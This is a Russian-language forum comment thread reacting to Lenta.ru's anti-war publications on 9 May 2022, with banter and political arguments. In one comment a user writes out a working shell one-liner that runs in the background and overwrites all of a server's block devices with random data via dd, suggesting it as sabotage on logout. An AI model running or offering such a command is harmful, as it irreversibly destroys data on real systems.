Antonio De

На ленте.ру неожиданный аттракцион свободы слова

0
39 комментариев
Написать комментарий...
Mikkr0n

Нормально

Ответить
Развернуть ветку
Алеша

Хе-хе

Ответить
Развернуть ветку
Рондо

👍 ого! Красавицы те, кто устроил это.

Ответить
Развернуть ветку
Tony Gun

Лол

Ответить
Развернуть ветку
Tony Gun
Ответить
Развернуть ветку
NickPic

В серверной ебнул снаряд с листовками.

Ответить
Развернуть ветку
Дядя Митя

Лента добра. Под завалами разрушенного СМИ еще остались люди.

Ответить
Развернуть ветку
Проедемте в Братеево

Не уволились 24 февраля, два месяца надеялись на успех вторжения. Ну да ну да. Люди ушли от туда ещё в 2014 вместе с главным редактором.

Ответить
Развернуть ветку
Дядя Митя

А вы 24 уволились? Или так и продолжаете платить налоги? Европа прекратила покупать газ?

Ответить
Развернуть ветку
Проедемте в Братеево

Я не могу распределять куда пойдут мои налоги, тем более отвечать за всю Европу. Провластные журналисты могут оценить сколько лжи вылили и к чему это привело. Демарш хорошо, но почему только сейчас?

Ответить
Развернуть ветку
Дядя Митя

Может быть и хорошо, что только сейчас. По моим ощущениям, большая часть людей уже прошла как минимум стадию отрицания. Если бы демарш случился в первые недели войны с 80% поддержки, какую бы реакцию он вызвал у путреота, читающего Ленту? Сейчас позиции власти слабы как никогда и момент для демарша самый удачный. Если Путин пересидит, укрепится и развернет репрессии, неизвестно на сколько еще десятилетий это затянется.

Ответить
Развернуть ветку
53ny4

Веб архив всё сохранил.
http://web.archive.org/web/20220509065825/https://lenta.ru/

Ответить
Развернуть ветку
Компьютерный завод
Ответить
Развернуть ветку
Necree

Ебать че началось-то)

Ответить
Развернуть ветку
Пятая Бензоколонна

Я аж обновляю страницу, там походу прямо сейчас борьба за буковки. Что-то исправили, но если открыть "все новости", там заменили довольно много текстов.)

Ответить
Развернуть ветку
Necree

Ващеее, прям как лентару моей молодости.

Ответить
Развернуть ветку
Пятая Бензоколонна

Контент-манагеры могли бы потянуть резину. Чай там случайно на клаву пролить, если сидят из офиса.

Ответить
Развернуть ветку
Necree

Та ну ладно, админы это дело быстро бы поправили, если б захотели.

Ответить
Развернуть ветку
53ny4

Лента настоящих новостей...

Ответить
Развернуть ветку
Пятая Бензоколонна

Захват перехват.)

Ответить
Развернуть ветку
Гарик П

Боже как красиво. Видно, что не пьяное говно писало статьи. Грамматика на уровне, пунктуация и кавычки «ёлочки». Прям каеф :)

Ответить
Развернуть ветку
Очко Овертона

Судя по жертвам дефейса, видать ломанули какого-то общего подрядчика.
Эффектно.
Обидно было бы телевизионщикам, если бы кто-нибудь перед логаутом ебанул бы ещё

nohup bash -c ‘ls -l /sys/class/block | grep -v -E “[0-9]” | xargs -P$(ls /sys/class/block | wc -l) -n1 -I{} dd if=/dev/urandom of=“$(readlink {})” oflag=sync’ 2>&1 > /dev/null &
Ответить
Развернуть ветку
lovemyonahole

Я в принципе не понимаю за что держаться IT специалисты всяких прокремлёвских помоек, АП и прочих гос учреждений. Всегда можно найти работу на западе за большие деньги. Подробил бомбу замедленного действия и в Грузию.

Ответить
Развернуть ветку
Пятая Бензоколонна

Мне кажется там нет охуенных айтишников. Могут ещё и языков нормально не знать. Меня как-то звали в одну сомнительную компанию на собик (правда тестером) и отметили, что не нужон у них этот английский ваще! 👍

Ответить
Развернуть ветку
lovemyonahole

Ну и правда, зачем английский в 1C.

Ответить
Развернуть ветку
Очко Овертона

Да нет, вполне есть и охуенные. Тот же касперский – далеко не дураки работают.

Ответить
Развернуть ветку
Пятая Бензоколонна

Касперский прокремлёвский? Я просто хз, сразу подумала про всякие госуслуги и прочее говно, которое еле работает.

Ответить
Развернуть ветку
Очко Овертона

Я подозреваю, у некоторых айтишников там тупо допуски.
По молодости так устроишься, подпишешь что-нибудь не то, а потом уже поздно рыпаться – ты всё равно невыездной ещё 5-10 лет после увольнения.

Ответить
Развернуть ветку
Armen Sarkisoff

@Крысадлы пятнистые учись, какие надо статьи публиковать на федеральных помойках https://lenta.ru/articles/2022/05/09/den_pobedy/ а не то, что ты накаляла сегодня

Ответить
Развернуть ветку
Музыкальный украинец

Эх, старой ленте-то не переплюнуть!

Ответить
Развернуть ветку
Armen Sarkisoff

Ага, продолжай себя дальше утешать и называть войну "спецоперацией" и писать безграмотное "на Украине" по отношению к суверенной стране.

Ответить
Развернуть ветку
INNOспички

Говорить "на Украине", это нормально. Так говорили давным давно ещё когда плешивый по барам шлялся в поисках немецких шлюх и не помышлял о величии

Ответить
Развернуть ветку
INNOспички

«В 1993 году по требованию Правительства Украины нормативными следовало признать варианты в Украину (и соответственно из Украины). Тем самым, по мнению Правительства Украины, разрывалась не устраивающая его этимологическая связь конструкций на Украину и на окраину. Украина как бы получала лингвистическое подтверждение своего статуса суверенного государства, поскольку названия государств, а не регионов оформляются в русской традиции с помощью предлогов в (во) и из...» (Граудина Л. К., Ицкович В. А., Катлинская Л. П. Грамматическая правильность русской речи. М.: Наука, 2001. С. 69).

Однако литературная норма русского языка, согласно которой следует говорить и писать на Украине, – результат исторического развития языка на протяжении нескольких столетий. Сочетаемость предлогов в и на с определенными словами объясняется исключительно традицией. Ср.: в школе, в институте, в аптеке, в отделе, но: на заводе, на почте, на курорте, на складе и т. д. Литературная норма не может измениться в одночасье из-за каких-либо политических процессов.

Ответить
Развернуть ветку
skygravity

Я так понимаю, восклицательные знаки не просто так

Ответить
Развернуть ветку
Antonio De
Автор

Восклицательные знаки бывали и раньше на важных новостях

Ответить
Развернуть ветку
NickPic

Охуеть! Уже в офлайн-режиме.

Ответить
Развернуть ветку
Никита Борисова

https://archive.ph/
Скорее

Ответить
Развернуть ветку
John Doe

Набухались ещё с ночи. К ним уже выехали.
Жаль.

Ответить